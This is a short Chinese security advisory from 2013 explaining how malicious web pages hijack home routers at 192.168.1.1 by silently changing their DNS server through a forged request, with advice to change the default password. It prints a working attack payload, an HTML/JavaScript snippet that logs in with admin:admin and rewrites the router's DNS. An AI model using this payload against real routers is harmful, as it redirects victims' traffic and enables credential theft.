http://192.168.1.1 请求用户密码信息为:
作者:未知 来源:绿盟整理 发布时间:2013-10-2 8:34:38
文章正文
访问网站的时候出现 http://192.168.1.1 请求用户密码信息为:
然后要你输入路由的登陆密码,这个是钓鱼网站的做法,通过特殊请求,比如
http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=www.xdowns.com&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6
如果是默认密码,直接登陆了,非默认密码,你输入就马上被修改dns服务器地址
修改为恶意的dns ip
这样你的密码会被偷取
解决方案:修改路由默认密码,清空路由dns
攻击代码示例:
<script>
function dns(){
i = new Image;
i.src='http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=www.xdowns.com&dnsserver2=8.8.4.4&Save=%B1%A3+%B4%E6';
}
</script>
<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=dns()>
文章来自绿盟(xDowns.com)转载请注明来路。